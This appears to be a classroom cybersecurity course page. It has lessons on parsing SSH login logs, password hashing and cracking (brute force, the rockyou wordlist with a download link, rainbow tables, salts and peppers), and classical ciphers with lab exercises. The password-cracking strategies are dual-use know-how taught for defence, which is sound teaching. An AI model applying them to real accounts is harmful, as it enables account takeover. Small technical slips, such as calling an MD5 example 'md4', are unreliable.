This line captures the user in the 2nd capture group, and the IP in the 3rd. The whole line is replaced with just the "username IP"

Combine with other commands

Remember that you can use other bash commands to convert the data for you.

sort | uniq -c | sort -nk1 will combine repeated values and sort them, so you can see which usernames attemted to log in the most, or which ip addresses.

Classwork/Homework:

Create a new directory and text file for your final submission CLASSWORK_REPONAME/03/sshlogs.txt in your classwork repo.

PLACE a heading with your LASTName/FIRSTName/PERIOD at the top of the text file.

Directions:

Answer the questions below about CyberSSHLogsDirty.txt

If you used a command to calculate the result, submit the command you used and an explanation of how it worked. A ballpark result is given so you know if you are close or not.

What flag of the uniq command shows the number of duplicates?
What flag of sort can sort numbers properly?
How many total attempts to log in as root were there? (exclude rootroot, root1 etc.) (~3500)
How many times was the account user1 used to try to connect? (~50ish)
How many unique IP addresses tried to connect as root? (~20ish) if you exclude rootroot, root1, root2 etc.)
How many IP addressses tried to connect more than 50 times as ANY account?
How many unique account names used to connect? (~300ish)
Which IP was used to try to connect the 2^nd most frequently as root?
What Country,City is that IP located in?

use the following format so i can easily see the answer and HOW you solved it.:

1: answer
command used (skip this if no command used)
explanation

2: answer
command used (skip this if no command used)
explanation

2026-02-09

2026-02-09T12:00:00+00:00

Homework:

Perusall on Passwords, Due tomorrow. Make 3 annotations

Resources:

You can find some resources in my home directory. I suggest you link to them in your documents using the following command:

ln -s /home/support/konstans/pub/cyber ~/Documents/cyber_resources

The command makes a link, specifically a -s or symbolic link, to MY ~/pub/cyber and places the link in your ~/Documents/. This will look like a directory, and all of you will have access.

Passwords:

Let us see why you need to include capital letters, numbers, and special characters in your passwords:

The actual impact of special characters is even greater, as this chart excludes many acceptable characters such as -+{}[]&lt&gt|\/

Let us use the shorthand for a type of password which contains many different symbols regardless of length, we will use the term "good password" to mean this. "good passwords" use Numbers, Upper+Lower case letters, AND symbols... That is about 80 possibilities on the keyboard per character. The number of passwords is therefore is 80^x where x = password length.

80¹ = 80
80² = 6400
80³ = 512,000
80⁴ = 40,960,000
80⁵ = 3,276,800,000
80⁶ = 262,144,000,000
80⁷ = 20,971,520,000,000
80⁸ = 1,677,721,600,000,000
80⁹ = 134,217,728,000,000,000

etc...

Here is a good measure to see how cheap cracking is available to all: https://thesecurityfactory.be/password-cracking-speed/

Passwords are hashed

In order to have your services not store your password,they store a hashed password. This is a one way encryption function.

When you submit your password, the service will hash what you submitted and check if that matches the hash that was stored, you typed your password correctly.

What are hashes?

A hash function is often called a trap door function. Computing the result is easy, computing the inverse of the operation is not possible. A function with no inverse that is used in hashing is the remainder operation.

example: Imagine adding up the ASCII values of a string and modding by some value. You could not undo this operation to get the string.

The example is a very poor hashing algorithm, but it illustrates that it is not difficult to come up with a trap door function.

Cracking Passwords:

Passwords are not cracked by guessing on the website login page, that is almost never the way you brute force a password.

In practice, websites can have their user data stolen, which includes a list of their users, their email addresses, and their encrypted passwords. There can be much more information stolen depending on the service that was hacked.

Since the passwords are encrypted and you cannot calculate the inverse of the hash you are safe... right?

Wrong.

Cracking Hashes:

Brute Force Attacks

The way you crack a hash is: use the same hashing algorithm on all possible words until the results match the hash of the password you are trying to find.

If you are given the md4 hash : 8ce4b16b22b58894aa86c421e8759df3 and you know the password is 1 character, you can just has try hashing each letter until you find it.

try that now: echo -n "STRING" | md5sum where STRING is just a 1 letter password.

Brute force a longer password

When you have more than one letter in your password you have to try all combinations of letters that are possible up to the length of the actual password.

In the table below, if you have the hash 84d961568a65073a3bcf0eb216b2a576 you just have to start hashing all words... "password" "letmein" "superman" etc. until the result matches your hash

attempt	result
hash("a")	0cc175b9c0f1b6a831c399e269772661
hash("b")	92eb5ffee6ae2fec3ad71c777531578f
...
hash("ab")	187ef4436122d1cc2f40dc2b92f0eba0
...
hash("letmein")	0d107d09f5bbe40cade3de5c71e9e9b7
...
hash("password")	5f4dcc3b5aa765d61d8327deb882cf99
...
hash("superman")	84d961568a65073a3bcf0eb216b2a576

Upon hashing superman, you can see that the resulting hash is the same as the original one we were looking for. The password is superman.

Fast computers can crack hashes VERY fast

Let us consider that a highly specialized computer or computer cluster can calculate billions of hashes per second. This means that a length 6 "good" password would take seconds to find the right hash, while a length 7 password would take minutes.

This is an arbitrary table that chooses an "old" fast way to crack passwords, newer ways are about 5-10 times faster. Notice that "1000 times faster! or 1 million times faster" would not help with passwords that are 15+ characters long.

As you can see from the image below: If everyone used randomized "good passwords" that were 15+ characters long, then cracking hashes would be impossible with current algorithms and hardware.

Password cracking strategies

https://xkcd.com/538/

Step 1: Password list

If you have a password list, you can try all of the common passwords first. This will weed out any weak passwords right away.

There is a list of real world passwords called rockyou. This list "rockyou.txt" contains 14,341,564 unique passwords, used in millions of different accounts. By pulling real world used passwords you can quickly check these particular passwords before you try to crack all the random ones. This has a high chance of succeeding on people that don't use good passwords!

rockyou.txt contains the most frequently used passwords sorted by frequency.

Keep in mind that rockyou is not really effective against targets with good password policies. To succeed with a dictionary attack you may need to create your own wordlist especially if your target is not in an english speaking country.

Hackers often supplement this password list with other password lists that contain multiple word combinations and common letter substitutions.

You can easily aquire this list by googling: "rockyou password list" or "rockyou password list github"

You can also find rockyou.txt in your cyber_resources directory so you DO NOT download it onto the school network.

here is a link to the list: https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Step 2: Rainbow tables

You can pre-compute all possible hashes for passwords up to a particular length. These precomputed list of passwords+hashes are called rainbow tables.

Step 3: brute force cracking

This can be dumb try all passwords brute forcing, or more intelligent ones.

Creative ways include combining multiple words into longer passwords, or patterns e.g. capitalized 1st letter, + 1 number at the end of the password.

Protection against Password cracking

Salt

To protect against password cracking attempts using rainbow tables, you can use a salt.

A salt is a random string of characters that is unique per user, and stored with the user information.

This has several benefits:

Users with the same password will have different hashes. So they must be cracked separately. This multiplies the cracking time by the number of hashshes stolen.
Rainbow tables most likely will not include significantly longer passwords (The salt length adds to the password length)

Pepper

To protect against password cracking attempts using brute force cracking we use a pepper.

When you add a random letter to the end of the password before hasing, this is called a pepper.

A pepper is NOT stored with the account, instead you have to try all possible pepper values.

This is trivial to test 26 or 52 letters when someone logs in, but imagine cracking and having to test 52 extra times per login.

This doesn't protect against rainbow tables as it is just one extra letter in length.

Putting it together:

username	password	salt	pepper	hash(pass + salt + pepper)	resulting hash
joe	"Password"	"aj3oD"	?	hash("Passwordaj3oD"+?)	f60e0e65d61f713ca1e1840aa096942c
dave	"Password"	"f03AL"	?	hash("Passwordf03AL"+?)	77e0e8bfdb1b0a0ebf9f0beafb81a5c4
joy	"Mxk4^d(l52Z"	"gns9R"	?	hash("Mxk4^d(l52Zgns9R"+?)	5a149d3f82c6f4ee24e62ab7f351a3b3

You can guess the pepper in these examples by running a command on the string + [a-zA-Z] and checking if any match

echo -n "password" | md5sum

Note the -n is a flag that removes the newline from the output of echo, so you don't include that in your hash function (md5)

Final thoughts

Do not implement your own password system. Use existing proven ones.

e.g. Using Google's OAuth 2.0 protocol for authentication and authorization. This lets you piggy back your service on top of googles already secure authentication process and you don't have to store any passwords.

go back to the top of the page

2026-02-10

2026-02-10T12:00:00+00:00

2026-02-10

Do Now

Consider dates in the format YYYY-MM-DD or YYYY/MM/DD, how do you match that using regex? (assume starting from the year 1000)

What if the year can be 2 or 4 digits. YY-MM-DD ? What if the MM and DD can be 1 digit, e.g. 4 instead of 04

Now what about validation of realistic already existing dates (19xx or 20xx) / also valid month/days: 00-99-99 is not valid.

Do not worry about matching correct number of days in the month, e.g. 31 days in Feburary isn't an issue.

^(19|20)?[0-9]{2}(\/|-)(1[0-2]|0?[1-9])\2(3[01]|[12][0-9]|0?[1-9])$

quick topic:

Browsers have inspect html or edit html features. Use this to check your answer to the prior question.

Quiz

You have a quiz on Feb (11|12) on regex + terminal commands / shell features (including pipes redirects etc).

Terminal

Minor point: cd and exit are not programs, they are built into the shell. This is different from ls, wc, cowsay, cp, mv, etc, are all programs.

Similarly &lt , &gt , | are also built into the shell.

The & and fg options are super useful built in shell features as well. Combined with Ctrl-Z you can run/send commands to the background of your shell while you do other things!

Addendum to hashing

Consider the output is modded by 1 billion, but there are more than 1 billion paswords. What are the consequences?

Since the output size is smaller than the input size there are some inputs that map to the same output, which is called a collision. It is very unlikely to guess a password with the same hash however, and as long as the collisions are spread evenly (not grouped together) then this is not an issue.

username	password	salt	pepper	hash(pass + salt + pepper)	resulting hash
joe	"Password"	"aj3oD"	?	hash("Passwordaj3oD"+?)	f60e0e65d61f713ca1e1840aa096942c
dave	"Password"	"f03AL"	?	hash("Passwordf03AL"+?)	77e0e8bfdb1b0a0ebf9f0beafb81a5c4
joy	"Mxk4^d(l52Z"	"gns9R"	?	hash("Mxk4^d(l52Zgns9R"+?)	5a149d3f82c6f4ee24e62ab7f351a3b3

Given the table above, find the pepper for joe and dave.

Discussion

How and when will a salt increase password security? In what situations will a salt not benefit security?

How and when will a pepper increase password security? In what situations will a pepper not benefit security?

What are some password policies can help protect your login credentials from being hacked?

Which password policies will help protect against rainbow tables attacks? Which backend policies will help against this?

What are some non-password policies can help protect your login credentials from being hacked?

Change Passwords

A minor detour from applied terminal skills:

Everyone needs to ssh onto the password server and change their password.

Instructions provided on the next line of html.

Go to the password server, ssh username@149.89.17.91 , then change your password using the command: passwd

go back to the top of the page

2025-02-12

2025-02-12T12:00:00+00:00

2025-02-12

Cryptography

Plain Text / Clear Text - Unencrypted, human-readable text. This is the data you wan to encrypt.

Cipher - The algorithm used to encrypt data.

Cipher Text - The encrypted text formatted by an encryption algorithm that is no longer human-readable.

Encryption Key - The second piece of information used by the encryption algorithm to encrypt and potentially decrypt the data later.

Properties of good cryptographic functions:

Keep the following properties in mind when looking at the different methods of encryption. These characteristics prevent patterns from being used to analyze the ciphertext.

Cipher text should appear completely random.
Cipher text should not be related to the plain text or it's distribution of characters.
Cipher text should not be related to the key or its characters.
Small changes in the key should completely change the cipher text.
Small changes in the plain text should completely change the cipher text.

Encryption:

Encryption is a form of data security.

Encryption is the process of converting readable data into a format that is not understood by any unauthorized person.

Decrypting the file requires access to a key/password.

The purpose of encryption is protecting sensitive information when being transmitted or stored.

Important prerequisites:

Binary Decimal and Hexadecimal

Decimal	Binary	Hexadecimal
00	0000	00
01	0001	01
02	0010	02
03	0011	03
04	0100	04
05	0101	05
06	0110	06
07	0111	07
08	1000	08
09	1001	09
10	1010	0A
11	1011	0B
12	1100	0C
13	1101	0D
14	1110	0E
15	1111	0F
16	10000	10
17	10001	11
…	…	…
727630	10110001101001001110	B1A4E

You should be able to:

Quickly convert 4 digit binary to and from hex

Quickly convert 4 digit binary to and from decimal

Convert large binary numbers to and from hex by breaking it into 2 or 4 bit chunks.

How to do this quickly/easily?

It is much easier to convert from hexadecimal to and from binary instead of using decimal (see next examples)

1010 0111                   A7   (A = 10₁₀ = 1010₂ and  7₁₀ = 0111₂)
1111 0000 1111              F0F
0100 1011 1111 0010         4BF2
0111 1010 0101 0000 0100    7A504
1011 0001 1010 0100 1110    B1A4E

What use is this?

Viewing a non-text document in hex (xxd command)
Color Codes
Mac addresses
modifying binary files
etc

Convert this String: "QzAF"

Given Q=81, z=122, A=65, and F=70

Convert into hex, and into Binary

Convert this mac address:

00:1A:2B:3C:4D:5E

To binary, separated by :'s

To decimal, separated by :'s

What can you do in 64k?

People try to make really elaborate demos (sound animation and such) in 64 kilobytes. Two such demos:
https://www.youtube.com/watch?v=yei3mJm33SQ
and here https://www.youtube.com/watch?v=mjzeP7hYyNo

go back to the top of the page

2025-02-13

2025-02-13T12:00:00+00:00

2025-02-13

Monoalphabetic Ciphers

A monoalphabetic cipher is one where each symbol in plain text is mapped to a fixed symbol in cipher text. The substitution not depend on the position of the plain text character, there is just a one to one mapping based on a single alphabetic key.

There are many different monoalphabetic substitution ciphers.

Each letter can be encrypted to any symbol, not just another letter. (See pigpen cipher https://en.wikipedia.org/wiki/Pigpen_cipher )

Shift ciphers

The Caesar cipher is a well known cipher where each letter is shifted based on a numeric key

Rot13 is a Caesar cipher where the key is 13.

Atbash

The atbash cipher (also called mirror cipher or backwards alphabet or reverse alphabet) is a cipher where you reverse the order of the letters. e.g. change A to Z, B to Y, and so on.

Simple Substitution

Since a shifted alphabet only has 26 possible rotations (or double that if you include reversing the order), that can be cracked instantly by trying all 26 keys.

Instead we use more randomized arrangments. There are 26! different substitution arrangements so that is much better for preventing someone from just printing 26 variations of the text and seeing which can be read.

That is: you can map the original alphabet to any permutation of the alphabet and use that as a key to encrypt/decrypt.

Variant keys

Rather than a full alphabet mapping as a key You can use a single word as a key (Move those letters to the front of the list):

Plaintext alphabet

ABCDEFGHIJKLMNOPQRSTUVWXYZ

Ciphertext alphabet

ZEBRASCDFGHIJKLMNOPQTUVWXY

Writing out ciphertext

Usually the ciphertext is written out in blocks of fixed length, omitting punctuation and spaces to disguise word boundaries from the plaintext.

It is easy to figure out substitutions when you see word boundaries because there are very few 2-3 letter words to test with trial and error.

Plaintext: "we are discovered!"

Ciphertext: "VA ZOA RFPBLUAOAR!"

To make it more difficult we alter the format:

Ciphertext in groups of 5 letters

VAZOA RFPBL UAOAR

Lab01 - Monoalphabetic ciphers

Deadline Wed Feb 26 8am

Makefile requirements

There is no make compile , your dependencies must be correct. Suppress your commands with @ in the makefile.

Part 1.1

Write a program that when given source text filename, analyzes letter frequency contained in that file.

Letter frequency should ignore case (both lower and uppercase are counted in the same category/bucket) Punctuation/special characters are completely discarded from the calculations. The denominator of the frequency should be the total number of letters counted.

Assume the text uses the English alphabet to simplify our programs.

Print out each letter and the frequency in the format: (NO SCIENTIFIC NOTATION! Some languages convert small numbers to scientific notation)

URGENT: If a frequency is 0.0, then do not print that letter.

URGENT: When PRINTING please round to 5 decimal places.

A 0.04521
B 0.00231
C 0.00134
D 0.00024
...
X 0.001
Y 0.00051
Z 0.0003

Implementation requirement:

You must have a function that takes a big string, and returns a list/array of the 26 frequencies in order[a-z]. This will make later parts easier.

int[] freq(String letters)

Tou can read the file OUTSIDE of your frequency function and pass in the contents of "alice.txt" as a string

e.g.

alice_contents=read("alice.txt");
freq_list = freq(alice_contents);
//freq_list now contains:
//[0.08161939411939412,
//0.01368985743985744,
//0.022275022275022274,
//...
//0.0013736263736263737,
//0.020994208494208494,
//0.0007239382239382239]

URGENT: When returning the list of frequencies DO NOT ROUND.

Test your frequency program

Try using it on alice in wonderland: https://gist.githubusercontent.com/phillipj/4944029/raw/75ba2243dd5ec2875f629bf5d79f6c1e4b5a8b46/alice_in_wonderland.txt

You should see percentages like:

STOP! Check your 1.1

Your lab01 part 1.1 should work like this:

$make frequency ARGS="inputFileName"

e.g.

$make frequency ARGS="alice.txt"

This enables a standard interface no matter what langage you use

You should create

Part 1.2

Write a program that when given two filenames, calculate the distance between two different sets of letter frequencies of each file.

Example 1 (3d point)

For the example below, we will pretend we only have letters, a,b,c,d.

Example 2 (4d point)

Given text1 has frequencies [0.2, 0.2, 0.2, 0.2] and text2 has frequencies [0.2, 0.25, 0.06, 0.29]

The distance is sqrt ( (.2 - .2) ² + (.2 - .25) ² + (.2 - .06) ² + (.2 - .29) ² )

The result of which is sqrt(0.0302), so the distance is: 0.173781

Important things to make sure of:

Your code should work with arrays of EQUAL size. In the case of our program, size = 26.

Urgent: your program should open files HOWEVER, you should not have a distance function take in filenames!

Your distance function should take the array of frequencies. This is critical as it allows you to read the file once, and re-use the resulting frequency table in multiple distance calculations.

e.g.

dist([0.1, 0.2, 0.3, 0.4, 0.0],[0.1, 0.2, 0.3, 0.4, 0.0]) returns 0.0

Do not do this: dist("filename1","filename2") Do not do this!

STOP! Check your 1.2

Your lab01 part 1.2 should work like this:

$make distance ARGS="inputFileName1 inputFileName2"

e.g.

$make distance ARGS="alice.txt other.txt"

Part 1.3

Write a program that when given a ciphertext filename, that contains a Caesar ciphered text analyzes letter frequency contained in that file, and deocdes the message automatically. Printing a single decodede message.

You should ALSO include reversed alphabet and reverse shifted alphabets.

This will work with sufficiently long ciphertexts, but short messages may not work well.

How to do this:

Your methodology should be to: .

Calculate the english_frequency by using alice.txt once.

Calculate the message_frequency of the message once.

Now find the rotation_number of the message_frequency that is closest to English using your distance function.

Rotate your message (try forward or back) by that rotation_number and you should have your decoded message.

To make this work with reversed alphabet ciphers (e.g. a and z are swapped, b and y are swapped.. etc.) you have to try to do the process twice, and see if swapped letters make a smaller minimum distance.

Note:

Punctuation and spaces are ignored for your frequency calculations, but are kept when decoding.

STOP! Check your 1.3

Your lab01 part 1.3 should work like this:

$make decode ARGS="inputFileName"

e.g.

$make decode ARGS="message.txt"

output:

DECODED_MESSAGE_HERE

Sample messages to try to decode:

Znoy skznuj corr sujole znk gxxge gtj tuz xkzaxt gteznotm.
Drp Kyv Wfitv Sv Nzky Pfl
Ftueuemomqemdoubtqdfqjf
Zlka zovz ka boxobaop sfp zlof alknzop ru 7 qlsbsqzoba. Zlsz ka aydob aoqybo erxkeyahu.
Jmqi rhybbyw, qdt jxu ibyjxo jelui. Tyt wohu qdt wycrbu yd jxu mqru: Qbb cycio muhu jxu rehewelui, Qdt jxu cecu hqjxi ekjwhqru.

Note: test 4 is atbash + a shift.

The last one should be: "Twas brillig, and the slithy toves. Did gyre and gimble in the wabe: All mimsy were the borogoves, And the mome raths outgrabe."

Not all messages will auto decode correctly depending on the text length and letters.

e.g. "jg upnro xo dla otqgpo" would NOT auto decode to: "ur faycz iz owl zebraz"

Repo Link

https://classroom.github.com/a/MVevWx9s

go back to the top of the page

2026-02-14

2026-02-14T12:00:00+00:00

2026-02-14♥

11/11 (🍫🥢) > 02/14 (❤️)

2026-02-23

2026-02-23T12:00:00+00:00

2026-02-23

Work on lab. You have all you need!

2026-02-25

2026-02-25T12:00:00+00:00

2026-02-25

Classwork

Your frequency analysis should work when piped into other commands.

Examples that should work:

Print the frequencies of A-E

make frequency ARGS="alice.txt" | head -n 5

Print the frequencies of W-Z

make frequency ARGS="alice.txt" | tail -n 5

Now try this:

Use Terminal Commands to sort your frequencies from high to low, and only look at the top 5.

Polyalphabetic ciphers

Multiple monoalphabetic ciphers are used to encrypt There are rules to determine when to use each one. The result of this is that two letters that are the same in the ciphertext do not have to be the same in plaintext.

Simple example:

Even positioned letters shift up by one. Odd positioned letters shift down by one.

Plaintext:

meet me at the hot dog stand

Ciphertext:

ndfs nd bs ugf gps enh ruzoc

In this cipher:

a can be either b or z

e can be either d or f

Playfair Cipher:

This uses a 5x5 table of letters which acts as the key. This means one letter must be omitted, often the I and J are combined, or Q is left out.

Example:
    P L A Y F
    I R E X M
    B C D G H
    K N O Q S
    T U V W Z

The word is then broken up into groups of two letters, and then those pairs are converted into ciphertext using the table.

If the letters are on the same column, use the letters to their right to replace them. (this can be a variable in the encryption methodology)
If the letters are on the same row, use the letters below them to replace them. (this can be a variable in the encryption methodology)
If the letters are different, replace them with the letters on the same row, but in the column of the other letter (it would make a rectangle)
If the letters are the same, replace the 2nd one with an X (or Q if you removed X) and then encrypt using the prior rules. (The least frequent letter is used for this to make it obvious when decrypting as double letters are much more common than X.)

The same row/col rules can be customized, so there are sixteen variants. horizontal=up/down/left/right and vertical=up/down/left/right as these are independent choices.

Let us use this to encrypt a short message:

Whitehat

Look at pairs of letters:

WH IT EH AT

Endcrypt rules: vertical goes right, horizontal goes down

This means Decrypt using the opposite operations. First break up the ciphertext in to pairs: ZG RU MD PV, then run the same rules, except vertical goes left /horizontal goes up.

Imagine the 2 plaintext letters WH are opposite corners of a rectangle, that pair of letters will be substituted with the letters in the other opposite corners

    P L A Y F
    I R E X M
    B C D G H
    K N O Q S
    T U V W Z

WH becomes ZG

IT becomes RU (vertical letters use the ones to the right)

EH becomes MD

AT becomes PV

Result:

ZGRUMDPV

Try to decode:

Encode : Same row letters use cell on the right.

Encode : Same column uses cell below.

"SIHTHTELMBVIDFSBKOKCWYCZSY"

using the key: "ABCDEFGHIKLMNOPQRSTUVWXYZ" (no 'J')

Decode : Same row letters use cell on the left.

Decode : Same column uses cell above.

Frequency:

This is plaintext:

Alice was beginning to get very tired of sitting by her sister on the bank, and of having nothing to do: once or twice she had peeped into the book her sister was reading, but it had no pictures or conversations in it, “and what is the use of a book,” thought Alice “without pictures or conversations?” So she was considering in her own mind (as well as she could, for the hot day made her feel very sleepy and stupid), whether the pleasure of making a daisy-chain would be worth the trouble of getting up and picking the daisies, when suddenly a White Rabbit with pink eyes ran close by her. There was nothing so very remarkable in that; nor did Alice think it so very much out of the way to hear the Rabbit say to itself, “Oh dear! Oh dear! I shall be late!” (when she thought it over afterwards, it occurred to her that she ought to have wondered at this, but at the time it all seemed quite natural); but when the Rabbit actually took a watch out of its waistcoat-pocket, and looked at it, and then hurried on, Alice started to her feet, for it flashed across her mind that she had never before seen a rabbit with either a waistcoat-pocket, or a watch to take out of it, and burning with curiosity, she ran across the field after it, and fortunately was just in time to see it pop down a large rabbit-hole under the hedge.

This is ciphertext:

BKHDCYDPCAHJSDSNLIYTJBQYCTEYHSAEKJXNSYSJLIEVJCSTNXYJTMOSJCCBOLDKENGIBUNSILTYIJLIYTENKODAMTRYHDDTJCFCASDYATAENSYTRJACNYKLJCSTNXYJWCDPTCBENSLGYPJSFCISKTHDPYTCTNWHKOYBSTEPJNSXNSJSDKCXFCSJTPJCXPJTKFELKLRJKYHIPENGDAXHRJKYPQHDPYTCTNWHKOYBSTEPJNSXTNRICYDPEMSXNICTNSHJMICTMYONNSEBRXBOKBXDRIADKYNBJKSPJCJMSEEUKCEAJCPHDYBOYBTWQNDYATUESITPAUNICMJYJCSPJCQKABPXTCKJKCNFLIBEDFTXHMDFMXKYNBCAYMSPJRJCPSKYGQJTGHJYSJLIAUDKASHDNFLIRJAEDFXNDTCMDOPXIDEAOMUECMJSCTBCDGRYJSFRNSOAEJTSDKBMNTACWJCTRJCTCYDPOKRJNSIQLYCTWTCOCPPFGQDJOSFCSOMTINEBNGDARJNSNFPTLYCTWOWAJMYPKJRJCYEUYTJCCPRJCTBCDGPTEUYTJSTDKGMJEACPMJEACPNXFCNVQGBOEPCYJCSXJCRJKYHISJYTYBPCJPCTUCSCXNYTDWAWSWTCESMJCTRJEPRIJTVFJRYTFCYBYMSICTAEEPRJNXAVPESYRJJYHNDJPENVNQDYCOAEPVJSDOEPWPBKAVRYJCOSJCPCDVDGPEERAFNVOVYTKLCUEPHMKYYTGJPTUCNXREKEPQMEOAPESIMKKLAEEPJSDKESJCMIWPSHAEKOBKHDDTPESPAEYTJCPHDYJYJKSHPJKBRIAEBDTMXDRICTNHSIRJEPRICJBEODYBQCAJMTDTDYDOCPBCDGRYJSJCJSJCPCUCNXREKEPQMEOAYTPCUCREJRTYFPJTYPKJJSDKECWPSNLIXHRJAWSHNTJSXTJCPCKDHWNTTPJCGJBOEBJPCTJSDKAIMTPYKDYJOVUCTIXPSJOSHNJYNTDYDJPQKTENXMBKCPJBPCDVDGRJKMAYSICTRJCJAEJB

Here is a useful tool to compare the letter frequencies. https://www.101computing.net/frequency-analysis/

Task: Compare the letter frequencies above using this tool.

Other Polyalphabetic Ciphers

Basic understanding: What does having multiple alphabetic substitutions do to prevent the code from being broken?

Creative: How could we design a more secure Polyalphabetic cipher?

Fun fact: encode and decode are not symmetric operations, but encode ten times is the same as not applying any changes. How can we use this property to "decode" using encode.

go back to the top of the page

2025-02-26

2025-02-26T12:00:00+00:00

2025-02-26

The vigenere cipher is a Polyalphabetic cipher that uses 26 different substitution ciphers. A string of text key is used to determine which cipher to use. The keyword is looped when the message is shorter than the key. The below is used for this cipher and is called a tabula recta, it is a 26 by 26 grid where each row is shifted one additional time.

Let us pick a key to use and a plaintext to encrypt. You repeat the key to fit the length of the plaintext.

Plaintext: asimpleexample

Key: battista


  asimpleexample
  battistabattis

Align the key with the plaint text. For every pair of letters, the top row of the table is for the key letter, the left column labels are for the plaintext. The location of the intersection is the ciphertext.

First letter pair

asimpleexample

battistabattis

Second letter pair

asimpleexample

battistabattis

Third letter pair

asimpleexample

battistabattis

Finish Encoding the example above!

asimpleexample (plaintext)
  battistabattis (keytext)
  BSB??????????? (ciphertext)

Decoding

Decoding the ciphertext requires that you know the key, and you align it with the ciphertext!


  battistabattis (keytext)
  BSB??????????? (ciphertext)

First letter pair to decode

battistabattis

BSB?????

Use column b, and find the B in that column. Move to the leftmost letter that aligns with that B... which is the A.

The message fully encoded is:

BSBFXDXEYAFITW

Try to Decode:

Ciphertext: LBTQRJCDFIGNWIIK
Key:        SUPERSUPERSUPERS

Why is this better?

Look at this plaintext:

Aged twenty six, Vigenere was sent to Rome on a diplomatic mission. It was here that he became acquainted with the writings of Alberti, Trithemius and Porta, and his interest in cryptography was ignited. For many years, cryptography was nothing more than a tool that helped him his diplomatic work, but at the age of thirty nine, Vigènere decided that he had amassed enough money to be able to abandon his career and concentrate on a life of study. It was only then that he began research into a new cipher.

Now let us look at two ciphertexts.

The first one is encrypted with a monoalphabetic cipher:

ETYR QVYIQX OBW, UBTYIYMY VEO OYIQ QJ MJHY JI E RBKGJHEQBC HBOOBJI. BQ VEO AYMY QAEQ AY NYCEHY ECLSEBIQYR VBQA QAY VMBQBITO JP EGNYMQB, QMBQAYHBSO EIR KJMQE, EIR ABO BIQYMYOQ BI CMXKQJTMEKAX VEO BTIBQYR. PJM HEIX XYEMO, CMXKQJTMEKAX VEO IJQABIT HJMY QAEI E QJJG QAEQ AYGKYR ABH ABO RBKGJHEQBC VJMF, NSQ EQ QAY ETY JP QABMQX IBIY, UBTYIYMY RYCBRYR QAEQ AY AER EHEOOYR YIJSTA HJIYX QJ NY ENGY QJ ENEIRJI ABO CEMYYM EIR CJICYIQMEQY JI E GBPY JP OQSRX. BQ VEO JIGX QAYI QAEQ AY NYTEI MYOYEMCA BIQJ E IYV CBKAYM.

The second is encrypted with a vigenere cipher

ETGU RLXRGA JGM, OMTGECGX ANU JCCM XB TFKT HR N FZNAHQNVZA BBWFKFL. XM ANU YCGX XUCK FT UIPCDC PVUHCZLIXH JKKF IAI JTZRXGKF QW YAUIEVZ, RGBXUGDGJL EAF GMGME, NPU FXL MAVVPTLX VP TPNIXBIIYEAC JCJ GVGMGGU. DDK QNPP WTTVF, EIWEMSTTRNWR ANU EMIAMAI DMGX XUCE Y IHSY VYYI AIYRVB WBQ UKJ BXIPBORRXV ABTB, ZJM EG VYC PZI BH KFXKXL PZLT, OMTGECGX HREZBTW XUCK FT AEQ CDYHLIQ GEMJZL ZQECN MS OG RZAX XB CSYCWSA JZQ RTVRGI YCW GBPTCCMVNVV MC T PVHV MU LXHFP. GI PEF QEJN MLRP KFPM LR DVEPG VRUVYGVL VPKM P GIJ EZNWXV

Assuming you ran frequency analysis on these texts and generate graphs, you could see the following:

letter distribution of plaintext:

letter distribution of monoalphabetic cipher:

letter distribution of vigenere cipher:

Shortcomings of Vigenere cypher

An attacker that knows the length of the key (or calculates it based on the distance between matching ciphertext) they can then break the cipher by analyzing subsets of letters. If the key length is 3, then you can make three groups of letters, and those groups will all have the same frequency patterns as normal text.

Repetitions in Ciphertext are a weakness:

It is not difficult to find the length of the key when keys are sufficiently short. Searching for blocks of ciphertext that look the same we can assume they are the same plaintext (for sufficiently large blocks of matching text, clearly not every pair of matching letters is the same plaintext.)

This is because repetition in the plaintext, could align with the same letters of the key:

Example:


  "saysyoussaysmessaysitsnow" (plaintext)
  "paperpaperpaperpaperpaper" (key)

Two of the words "say" ("saysyoussaysmessaysitsnow") align with "pap" thus they will have the same ciphertext

Lets look at how we can find the keylength

  VHVSSPQUCEMRVBVBBBVHVSURQGIBDUGRNICJQUCERVUAXSSR
  ^     ^           ^                 ^
  0     6           18                36

The distance between the repetitions of VHVS is 18.

The key length could be 18, 9, 6, 3, 2 or 1 character long.

The distance between the repetitions of QUCE is 30 characters.

The key length could be 30, 15, 10, 6, 5, 3, 2 or 1 character long.

By taking the intersection of those sets, one could safely conclude that the most likely key length is 6 since 3, 2, and 1 are unrealistically short.

Use longer keys!

Frequency analysis fails when the key is a large fraction of the message, certainly when the key is equal in length to the message.

Computers can do it too!

On paper a lookup table is faster for humans.

Think about how a computer program could be implemented. In effect, the index of each row in the table tells you how many characters to shift each letter of the plaintext by.
Row (A) is 0, so there is no rotation,
row (B) is 1, so you rotate left by 1.
row (C) is 2, so you rotate left by 2,etc.

Use Long Keys

If the keyword is as long as the plaintext, the cipher is unbreakable if a new key is used for every message.

Suppose you recieved the following encrypted message:

JTLOMFJRCSXM

If the receiver uses the keyword hfikeniaoitz they would receive the message:

CODEISBROKEN

If the receiver uses the keyword hfikenrnaygi they would receive the message:

CODEISSECURE

Even if it were possible to calculate all the possible keywords of length 12 in a reasonable amount of time, the ciphertext would produce every sensible message of length 12. There is no way to determine which message the sender wished to communicate

One can use a long key like a paragraph or chapter of a book, and that would prevent frequency analysis.

Fake a long key!

Another way to make a long key is to encrypt it multiple times using keys of different lengths:

A key of GO would shift letters by 6 then 14 then 6 then 14

A key of CAT would shift letters by 2 then 0 then 19...

Encrypting once with each key has an effective length longer than the two keys:

Text:  ATTACKATDAWN
Key1:  GOGOGOGOGOGO
Key2:  CATCATCATCAT [pairs of letters after 6th character]
Ciph:  IHSQIRIHCQCU

A is shifted by G then C (6 + 2)
T is shiffted by O then A (14 + 0)
T is shifted by G then T (6 + 19)
A is shifted by O then C (14 + 2)
C is shifted by G then A (6 + 0)
K is shifted by O then T (14 + 19) [after this it repeats back to G+C]

Key1 has length of 2, Key2 has length of 3, but the effective length of the key is the product of their lengths or 6, as there are 6 different shifted totals created by this. (The effective length is the least common multiple of all the keys) Prime numbers LCM's will be the product of their lengths which allows for very large effective key sizes.

Encrypting three times using key sizes 5, 13, 19 would create an effective key size of 1235

Note that for the Equal length keys such as "FISH" "PORK" "CHIP" "YUMM" would NOT produce a better result, as their relative lengths have a common multiple of 4.

Crack Vigenere

Homework (Lab 1.5)

